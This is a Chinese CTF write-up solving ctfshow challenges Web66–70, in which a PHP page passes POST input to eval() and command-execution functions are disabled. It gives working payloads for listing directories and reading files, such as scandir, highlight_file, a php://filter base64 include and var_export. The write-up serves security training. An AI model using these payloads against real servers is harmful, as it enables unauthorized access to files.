ctfshow(66->70)--RCE/命令执行漏洞--禁用命令执行函数

Web66

源代码:

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

代码审计:

POST传参c,eval进行代码执行。

思路:

由于题目过滤了命令执行函数,所以使用其他方法进行RCE。

先使用c=var_dump(scandir("."))查看当前目录下的文件,发现了flag.php
highlight_file('flag.php')查看发现没有flag.

于是使用c=var_dump(scandir("/"))查看根目录,发现flag.txt

EXP:

c=highlight_file('/flag.php');

得到flag.

Web67

与上一题做法相同。

Web68

进入界面,回显为一个报错:

代码审计:

说明highlight_file()函数被禁用了。

思路:

用php伪协议查看文件内容。

EXP:

c=include($_POST[1]);&1=php://filter/convert.base64-encode/resource=/flag.txt

base64解码得到flag.

Web69

回显与上一题相同。

思路

查看目录下的文件:

c=var_dump(scandir("/"));
c=print_r(scandir("/"));

发现两个打印函数都被过滤了。

替换为var_export或implode即可。

EXP:

查看目录:

c=var_export(scandir("/"));
c=echo implode("--",scandir("/"));

读取文件内容:

c=include("/flag.txt");

Web 70

与上一题做法相同。

相关推荐
黑客笔记2 小时前
第11章 web应用程序安全(网络安全防御实战--蓝军武器库)
web安全·网络安全·wireshark
黑客Jack3 小时前
属于网络安全规划重安全性需求
安全·web安全·php
暴躁的小胡!!!6 小时前
Linux权限维持之协议后门(七)
linux·运维·服务器·网络·安全
安 当 加 密6 小时前
中小企业Radius认证服务器的低成本高安全解决方案
运维·服务器·安全
vortex57 小时前
在Kali中使用虚拟环境安装python工具的最佳实践:以 pwncat 为例
linux·python·网络安全·渗透测试·pip·kali
Codingwiz_Joy7 小时前
Day04 模拟原生开发app过程 Androidstudio+逍遥模拟器
android·安全·web安全·安全性测试
snpgroupcn8 小时前
ECC升级到S/4 HANA的功能差异 物料、采购、库存管理对比指南
运维·安全·数据库架构
旭华智能9 小时前
地下井室可燃气体监测装置:守护地下安全,防患于未“燃”!
安全
暴躁的小胡!!!9 小时前
Linux权限维持之vim python 扩展后门(五)
linux·运维·服务器·网络·安全
TinTin Land11 小时前
后 Safe 时代:多签钱包安全新范式与防范前端攻击的新思路
前端·安全